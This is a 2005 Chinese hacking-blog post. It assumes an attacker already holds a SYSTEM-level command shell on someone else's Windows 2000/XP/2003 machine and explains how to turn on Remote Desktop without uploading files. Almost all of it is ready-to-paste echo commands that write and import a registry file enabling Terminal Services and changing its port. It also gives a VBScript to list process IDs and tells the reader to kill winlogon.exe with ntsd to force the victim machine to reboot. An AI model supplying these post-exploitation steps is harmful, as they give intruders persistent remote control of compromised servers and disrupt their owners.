林网博客
探讨计算机网络安全 拓展计算机网络应用
RSS
  • Home
  • 关于
  • 日志存档

开启终端的最简单方法全攻

八月 20, 2005 by linker | 0 Comment » | 16 views

今天介绍的这种开终端的方法,绿色,环保,无污染~~
不须上传任何文件开启终端的方法适合win2k,xp,2003.
本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~
在无须传任何文件的情况下开启终端服务。
一、win 2k下终端开启终端
首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:

echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo “Enabled”=”0″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo “ShutdownWithoutLogon”=”0″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo “EnableAdminTSRemote”=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo “TSEnabled”=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo “Start”=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo “Start”=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo “Hotkey”=”1″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo “PortNumber”=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo “PortNumber”=dword:00000D3D >>3389.reg
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效。
一个简单的办法就是用ntsd.exe(win 2k以上自带的命令)结束一个重要的进程就可以实现机器重启了!!
比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)
winlogon.exe被关闭后机器立刻强制重启了
命令执行格式为ntsd -c q -p PID
那如何知道winlogon.exe的PID进程号呢~
以下这个脚本可以列举当前所有进程的PID:

wscript.echo “PID ProcessName”
for each ps in getobject(“winmgmts:\\.\root\cimv2:win32_process”).instances_
wscript.echo ps.handle&vbtab&ps.name
next
在CMDSHELL窗口下贴上如下ECHO代码就可以得到查看进程PID的脚本1.vbe:
echo wscript.echo “PID ProcessName”>>1.vbe
echo for each ps in getobject(“winmgmts:\\.\root\cimv2:win32_process”).instances_ >>1.vbe
echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe
echo next>>1.vbe

生成1.vbe后请检查一下echo出来的脚本是否有错(才四行,对一下上面给出的就可以了)。
运行1.vbe得到如下运行结果:

C:\WINNT\system32>cscript 1.vbe
cscript 1.vbe
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows
版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.

PID ProcessName
0 System Idle Process
8 System
152 smss.exe
180 csrss.exe
200 winlogon.exe
228 services.exe
240 lsass.exe
424 svchost.exe
472 spoolsv.exe
512 msdtc.exe
616 svchost.exe
628 KAVSvc.EXE
660 llssrv.exe
692 nvsvc32.exe
728 regsvc.exe
748 MSTask.exe
776 alter.exe
900 svchost.exe
916 WinMgmt.exe
1088 Dfssvc.exe
484 Explorer.EXE
1444 mdm.exe
1340 Server.exe
1224 ibguard.exe
1252 KAVSvcUI.EXE
1256 ibserver.exe
1336 internat.exe
1204 Uspds.exe
720 bar.exe
1288 dllhost.exe
1580 inetinfo.exe
1672 cmd.exe
1464 pppoe.exe
1704 regedit.exe
316 cscript.exe

从上面可以看出当前winlogon.exe的PID号为200运行命令ntsd -c q -p 200 (这里的200要替换为winlogon.exe进程对就的PID啦)过会儿机器马

上重启了(ntsd.exe是WIN自带的可用来结束任意级别进程)等着收获吧~~

二、winxp和win2003终端开启

开启的REG文件代码如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
“fDenyTSConnections”=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
“PortNumber”=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
“PortNumber”=dword:00000D3D
用以下ECHO代码写一个REG文件:
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo “fDenyTSConnections”=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo “PortNumber”=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo “PortNumber”=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
这样xp和2003开启终端是不用重启的如果你想改端口只需把上面的两个PortNumber对应的D3D改成相应十进制数的十六进制形式就可以了!用计算器转换吧。XP下不论开终端还是改终端端口都不需重启,真是太妙了~~呵呵。如果要关闭终闭只需把”fDenyTSConnections”=dword:00000000

改成”fDenyTSConnections”=dword:00000001

你也许还想了解这些

  • 2006年03月10日 -- 自己制作蜜罐捕捉入侵者
  • 2005年12月5日 -- Byshell后门:无进程无DLL无硬盘文件
  • 2005年09月16日 -- Win 2003 server配置安全个人Web服务器
  • 2005年08月21日 -- 深山红叶汉化的MT 简单说明
  • 2006年04月20日 -- IIS突然不解析asp文件的处理步骤
  • 2006年01月8日 -- 渗透某知名公司内部网络
  • 2005年12月6日 -- PHP 4.1.0 – php.ini 全文翻译
  • 2005年12月5日 -- ASP编程中20 个非常有用的例子
  • 2005年12月3日 -- 渗透之简单任务
  • 2005年11月21日 -- Tomcat 配置集锦

技术文摘 | Tags: ati, hi, ie, key, microsoft, pr, rss, server, service, windows, xp, 代码, 命令, 服务, 注册, 注册表, 端口


Leave a Reply





点击取消回复

林网博客 Sponsors


  • favicon.ico图标在线制作网站推荐(61,669)
  • 修改限制discuz论坛注册名长度(40,923)
  • intel 82801EB ICH5 ac97声卡驱动下载(10,461)
  • 手动关闭gzip方法(phpwind、discuz和supesite)(8,311)
  • google来路突然减少与恢复(8,226)
  • intel 82801EB ICH5 ac97声卡驱动完整安装版下载(8,090)
  • windows7声卡驱动Realtek HIgh Definition Audio的下载和安装(5,874)
  • 笔记本遇到驱动安装不完整提示“microsoft ACPI-Compliant System ”(4,253)
  • 日志存档(3,339)
  • 笔记本thinkpad T400安装server 2003系统所需要驱动程序整理大全(3,052)
    • 随机文章

      • 优化企业网站实用的十一个步骤
      • 管理中绝对经典的18个故事
      • 维修电脑时的平静与思考
      • 微软Windows XP防盗版反馈信息曝光
      • 微软1G网盘免费申请:Skydrive
      • Intel ICH10 设备编号及其驱动的安装
      • 小题大作 Windows 7 简体中文版泄漏
      • 传奇私服里的Rootkit设置(转)
      • 中国留下传世的经典瞬间![组图]
      • Google AdSense重要新功能 — 在新窗口中打开广告
    • 近期热评文章

      • Google搜索工作原理(图) (7)
      • 腾迅搜搜优化分析 (6)
      • 警钟:IT人缺乏睡眠的可怕后果 (6)
      • 设置phpmyadmin 允许空密码登陆 (4)
      • 什么是google沙盒?如何防止进入沙盒? (4)
      • 马化腾看好电子商务与搜索 你做了没? (3)
      • 数据恢复必须打起十二分的小心 (3)
      • 中文SEO相关工具大全 (3)
      • 彻底解决“因为发生错误,安装过早结束”问题 (2)
      • 重启服务器解决数据库连接错误Provider 错误 '80004005' (2)
    • 最近发表文章

      • 一张神秘的SEO图表
      • Nvidia显卡更新驱动后windows7图片查看器背景为粉红色
      • 什么是google沙盒?如何防止进入沙盒?
      • HTC T3333死机后的资料备份问题
      • 中文SEO相关工具大全
      • Google搜索工作原理(图)
      • History and development of sports betting
      • 警钟:IT人缺乏睡眠的可怕后果
      • 腾迅搜搜优化分析
      • 所有邮箱登陆都提示“你找的文件服务器上找不到”
      • the United States’s Pawn Shops
      • seo团队的建立和运营
    • 特别链接

      • PE管
      • 地板之家
      • 河南商网
      • 火狐插件
      • 郑州云海
    Copyright © 2010 林网博客 All Rights Reserved XHTML CSS THEME by I SOFTWARE REVIEWS